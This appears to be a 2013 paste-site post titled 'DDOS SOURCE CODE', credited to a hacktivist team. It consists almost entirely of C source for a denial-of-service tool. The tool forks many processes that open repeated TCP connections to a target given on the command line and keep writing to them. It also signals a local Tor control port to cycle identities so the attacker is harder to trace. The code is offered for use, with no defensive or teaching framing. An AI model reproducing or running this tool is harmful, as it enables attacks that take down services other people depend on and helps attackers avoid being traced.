DDOS SOURCE CODE


SUBMITTED BY: Guest

DATE: Nov. 12, 2013, 2:50 a.m.

FORMAT: Text only

SIZE: 3.9 kB

HITS: 1280

  1. ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  2. =======================================
  3. ^^ HELLO EVERYONE THIS CODE IS FOR ^^
  4. || MOST POWERFUL DDOS CODE ||
  5. || BY : JUAN DELA CRUZ ||
  6. || ANONYMOUS PHILIPPINES ||
  7. || TEAM: COD3X & HACK PRO ||
  8. ^^ ^^
  9. =======================================
  10. ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  11. #include <stdio.h>
  12. #include <stdlib.h>
  13. #include <string.h>
  14. #include <stdint.h>
  15. #include <unistd.h>
  16. #include <netdb.h>
  17. #include <signal.h>
  18. #include <sys/socket.h>
  19. #include <sys/types.h>
  20. #include <netinet/in.h>
  21. #include <arpa/inet.h>
  22. int make_socket(char *host, char *port) {
  23. struct addrinfo hints, *servinfo, *p;
  24. int sock, r;
  25. // fprintf(stderr, "[Connecting -> %s:%s\n", host, port);
  26. memset(&hints, 0, sizeof(hints));
  27. hints.ai_family = AF_UNSPEC;
  28. hints.ai_socktype = SOCK_STREAM;
  29. if((r=getaddrinfo(host, port, &hints, &servinfo))!=0) {
  30. fprintf(stderr, "getaddrinfo: %s\n", gai_strerror(r));
  31. exit(0);
  32. }
  33. for(p = servinfo; p != NULL; p = p->ai_next) {
  34. if((sock = socket(p->ai_family, p->ai_socktype, p->ai_protocol)) == -1) {
  35. continue;
  36. }
  37. if(connect(sock, p->ai_addr, p->ai_addrlen)==-1) {
  38. close(sock);
  39. continue;
  40. }
  41. break;
  42. }
  43. if(p == NULL) {
  44. if(servinfo)
  45. freeaddrinfo(servinfo);
  46. fprintf(stderr, "No connection could be made\n");
  47. exit(0);
  48. }
  49. if(servinfo)
  50. freeaddrinfo(servinfo);
  51. fprintf(stderr, "[Connected -> %s:%s]\n", host, port);
  52. return sock;
  53. }
  54. void broke(int s) {
  55. // do nothing
  56. }
  57. #define CONNECTIONS 8
  58. #define THREADS 48
  59. void attack(char *host, char *port, int id) {
  60. int sockets[CONNECTIONS];
  61. int x, g=1, r;
  62. for(x=0; x!= CONNECTIONS; x++)
  63. sockets[x]=0;
  64. signal(SIGPIPE, &broke);
  65. while(1) {
  66. for(x=0; x != CONNECTIONS; x++) {
  67. if(sockets[x] == 0)
  68. sockets[x] = make_socket(host, port);
  69. r=write(sockets[x], "\0", 1);
  70. if(r == -1) {
  71. close(sockets[x]);
  72. sockets[x] = make_socket(host, port);
  73. } else
  74. // fprintf(stderr, "Socket[%i->%i] -> %i\n", x, sockets[x], r);
  75. fprintf(stderr, "[%i: Voly Sent]\n", id);
  76. }
  77. fprintf(stderr, "[%i: Voly Sent]\n", id);
  78. usleep(300000);
  79. }
  80. }
  81. void cycle_identity() {
  82. int r;
  83. int socket = make_socket("localhost", "9050");
  84. write(socket, "AUTHENTICATE \"\"\n", 16);
  85. while(1) {
  86. r=write(socket, "signal NEWNYM\n\x00", 16);
  87. fprintf(stderr, "[%i: cycle_identity -> signal NEWNYM\n", r);
  88. usleep(300000);
  89. }
  90. }
  91. int main(int argc, char **argv) {
  92. int x;
  93. if(argc !=3)
  94. cycle_identity();
  95. for(x=0; x != THREADS; x++) {
  96. if(fork())
  97. attack(argv[1], argv[2], x);
  98. usleep(200000);
  99. }
  100. getc(stdin);
  101. return 0;
  102. }

comments powered by Disqus